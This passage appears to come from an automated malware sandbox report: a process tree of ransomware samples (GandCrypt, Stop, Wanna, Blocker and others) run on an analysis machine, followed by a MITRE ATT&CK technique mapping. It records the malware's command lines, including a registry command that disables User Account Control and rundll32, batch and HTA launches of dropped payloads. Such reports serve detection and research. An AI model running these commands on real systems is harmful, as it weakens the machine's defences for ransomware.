                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Modifies registry key
                                                                                                                                                                                              PID:8624
                                                                                                                                                                                        • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.GandCrypt.jfg-d38b26937bd587d9379f831f4e26ac06bd78f1fb4bc238b4fb560ed28f4057df.exe
                                                                                                                                                                                          Trojan-Ransom.Win32.GandCrypt.jfg-d38b26937bd587d9379f831f4e26ac06bd78f1fb4bc238b4fb560ed28f4057df.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Suspicious use of SetWindowsHookAW
                                                                                                                                                                                          PID:6840
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 472
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:3872
                                                                                                                                                                                        • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.GenericCryptor.czo-6406ec2fe20d43c6b66385d2c86b3b5042231feb8ea0e94e5d7537b539f1b990.exe
                                                                                                                                                                                          Trojan-Ransom.Win32.GenericCryptor.czo-6406ec2fe20d43c6b66385d2c86b3b5042231feb8ea0e94e5d7537b539f1b990.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          PID:6780
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\huter.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\huter.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:8948
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:9024
                                                                                                                                                                                            • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Petr.a-ea8f0ea01490c66c2971ec5c9adc45c7934a32258a36f118604ed7231f3505bd.exe
                                                                                                                                                                                              Trojan-Ransom.Win32.Petr.a-ea8f0ea01490c66c2971ec5c9adc45c7934a32258a36f118604ed7231f3505bd.exe
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5296
                                                                                                                                                                                              • C:\Users\Admin\Desktop\00461\Trojan-Ransom.Win32.Wanna.zbu-fe18f7f9cbb9d2de4effeb0073f232e65140d2e8e214448d19ed8125d74aa4f5.exe
                                                                                                                                                                                                Trojan-Ransom.Win32.Wanna.zbu-fe18f7f9cbb9d2de4effeb0073f232e65140d2e8e214448d19ed8125d74aa4f5.exe
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:8648
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 8648 -s 232
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:8888
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 8648 -s 236
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:6212
                                                                                                                                                                                                • C:\Users\Admin\Desktop\00461\Trojan.Win32.Crypt.xxr-c6afa535aeea44871beb91eea0df5dbe3cd1360274795a3de500935ac60cbeba.exe
                                                                                                                                                                                                  Trojan.Win32.Crypt.xxr-c6afa535aeea44871beb91eea0df5dbe3cd1360274795a3de500935ac60cbeba.exe
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:8988
                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00461\UDS-Trojan-Ransom.Win32.Stop-ec9b52c1bb057ccc42303619dd893426733c8706bea951a0e863200d43bedd49.exe
                                                                                                                                                                                                    UDS-Trojan-Ransom.Win32.Stop-ec9b52c1bb057ccc42303619dd893426733c8706bea951a0e863200d43bedd49.exe
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:7924
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00461\UDS-Trojan-Ransom.Win32.Stop-ec9b52c1bb057ccc42303619dd893426733c8706bea951a0e863200d43bedd49.exe
                                                                                                                                                                                                      UDS-Trojan-Ransom.Win32.Stop-ec9b52c1bb057ccc42303619dd893426733c8706bea951a0e863200d43bedd49.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:300
                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00461\UDS-Trojan-Ransom.Win32.Stop-ec9b52c1bb057ccc42303619dd893426733c8706bea951a0e863200d43bedd49.exe
                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00461\UDS-Trojan-Ransom.Win32.Stop-ec9b52c1bb057ccc42303619dd893426733c8706bea951a0e863200d43bedd49.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:7740
                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00461\UDS-Trojan-Ransom.Win32.Stop-ec9b52c1bb057ccc42303619dd893426733c8706bea951a0e863200d43bedd49.exe
                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00461\UDS-Trojan-Ransom.Win32.Stop-ec9b52c1bb057ccc42303619dd893426733c8706bea951a0e863200d43bedd49.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:7880
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00461\VHO-Trojan-Ransom.Win32.Blocker.gen-840c87b9d16093feae04ed6005b2b5c76f52d34e22ac151a45bd64806d14e6a1.exe
                                                                                                                                                                                                      VHO-Trojan-Ransom.Win32.Blocker.gen-840c87b9d16093feae04ed6005b2b5c76f52d34e22ac151a45bd64806d14e6a1.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:6964
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00461\Win.Ransomware.Azvo-9979243-0-16f58770f4880e8fbcc446bcec502bc6c44c837dbaf6afc0611271e48ecc0073.exe
                                                                                                                                                                                                      Win.Ransomware.Azvo-9979243-0-16f58770f4880e8fbcc446bcec502bc6c44c837dbaf6afc0611271e48ecc0073.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:7128
                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00461\Win.Ransomware.Generic-9843054-0-8a2ac646b0c8064435b15dd1d08935230a0042674d96e54162e4fa6cebe53b3d.exe
                                                                                                                                                                                                        Win.Ransomware.Generic-9843054-0-8a2ac646b0c8064435b15dd1d08935230a0042674d96e54162e4fa6cebe53b3d.exe
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:7552
                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00461\Win.Ransomware.Protected-7428309-0-54044fea73ffe3b48cbc28ace2795119a37af091d3ed7870a79232b5989857f3.exe
                                                                                                                                                                                                          Win.Ransomware.Protected-7428309-0-54044fea73ffe3b48cbc28ace2795119a37af091d3ed7870a79232b5989857f3.exe
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:7796
                                                                                                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:2836
                                                                                                                                                                                                        • C:\Program Files\7-Zip\7zFM.exe
                                                                                                                                                                                                          "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00461.7z"
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                          PID:1232
                                                                                                                                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                          PID:2304
                                                                                                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                            "C:\Windows\system32\taskmgr.exe" /1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                            PID:4236
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2488 -ip 2488
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1756
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5068 -ip 5068
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:1460
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1080 -ip 1080
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4856
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5068 -ip 5068
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4948
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5068 -ip 5068
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:3680
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5068 -ip 5068
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4128
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5068 -ip 5068
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4308
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5068 -ip 5068
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:464
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5708 -ip 5708
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4308
                                                                                                                                                                                                                          • C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
                                                                                                                                                                                                                            C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4936
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2308 -ip 2308
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5644
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5752 -ip 5752
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:6628
                                                                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  PID:6620
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                    PID:6640
                                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                  PID:6984
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6840 -ip 6840
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6180
                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k swprv
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2212
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5220 -ip 5220
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:6980
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 8648 -ip 8648
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:8716
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 8648 -ip 8648
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:6840
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5508 -ip 5508
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:8760
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5976 -ip 5976
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:9172
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5004 -ip 5004
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:7612
                                                                                                                                                                                                                                                • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Generic-abd3add9774fe7ab00a10ed781438c2602ee836c2d45f3a310965b1eeb8b5529\i9Cj8fGj0.README.txt
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5248
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4492 -ip 4492
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:6260
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5824 -ip 5824
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:7952
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5424 -ip 5424
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:8680
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4220 -ip 4220
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:8576
                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:7536
                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:7148
                                                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8122264-ba1e-48dd-800b-d66369aa6e27} 7148 "\\.\pipe\gecko-crash-server-pipe.7148" gpu
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4024
                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2420 -prefMapHandle 2360 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {adcc73cb-dba7-463c-83be-f628c48eb5be} 7148 "\\.\pipe\gecko-crash-server-pipe.7148" socket
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:7068
                                                                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1304 -childID 1 -isForBrowser -prefsHandle 2664 -prefMapHandle 2924 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5be402b7-9438-4f79-916f-c74d3db290b5} 7148 "\\.\pipe\gecko-crash-server-pipe.7148" tab
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:1472
                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3828 -childID 2 -isForBrowser -prefsHandle 3872 -prefMapHandle 3868 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12fec4ab-e188-4008-9467-d02f103b398b} 7148 "\\.\pipe\gecko-crash-server-pipe.7148" tab
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:6316
                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4344 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4340 -prefMapHandle 4252 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2baf7cb-9554-4b15-aea4-eb43ef739120} 7148 "\\.\pipe\gecko-crash-server-pipe.7148" utility
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:6776
                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 3 -isForBrowser -prefsHandle 5200 -prefMapHandle 5204 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c89085ae-7459-4bb5-8ac1-ad8f9bf1f9ac} 7148 "\\.\pipe\gecko-crash-server-pipe.7148" tab
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:6092
                                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5048 -childID 4 -isForBrowser -prefsHandle 5368 -prefMapHandle 5372 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d48836c5-97f4-47f6-9c99-d241ff3d1758} 7148 "\\.\pipe\gecko-crash-server-pipe.7148" tab
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:8536
                                                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5136 -childID 5 -isForBrowser -prefsHandle 5564 -prefMapHandle 5568 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9637ca6-6cbb-42a4-a6d6-ff8dcde14027} 7148 "\\.\pipe\gecko-crash-server-pipe.7148" tab
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:8324
                                                                                                                                                                                                                                                                              • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:4636
                                                                                                                                                                                                                                                                                • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.txt
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Opens file in notepad (likely ransom note)
                                                                                                                                                                                                                                                                                  PID:6508
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\SubmitReset.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:7512
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\NOTEPAD.EXE
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00461\t\Executable.bat
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Opens file in notepad (likely ransom note)
                                                                                                                                                                                                                                                                                    PID:8128

                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                  Reconnaissance

                                                                                                                                                                                                                                                                                  Resource Development

                                                                                                                                                                                                                                                                                  Initial Access

                                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                                  Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1059

                                                                                                                                                                                                                                                                                  PowerShell

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1059.001

                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053.005

                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1547

                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1547.001

                                                                                                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1543

                                                                                                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053.005

                                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                                  Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1548

                                                                                                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1548.002

                                                                                                                                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1547

                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1547.001

                                                                                                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1543

                                                                                                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053.005

                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                  Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1548

                                                                                                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1548.002

                                                                                                                                                                                                                                                                                  File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1222

                                                                                                                                                                                                                                                                                  Impair Defenses

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1562

                                                                                                                                                                                                                                                                                  Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1562.004

                                                                                                                                                                                                                                                                                  Disable or Modify Tools

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1562.001

                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                                                                                  Credentials from Password Stores

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1555

                                                                                                                                                                                                                                                                                  Credentials from Web Browsers

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1555.003

                                                                                                                                                                                                                                                                                  Unsecured Credentials

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1552

                                                                                                                                                                                                                                                                                  Credentials In Files

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1552.001

                                                                                                                                                                                                                                                                                  Discovery

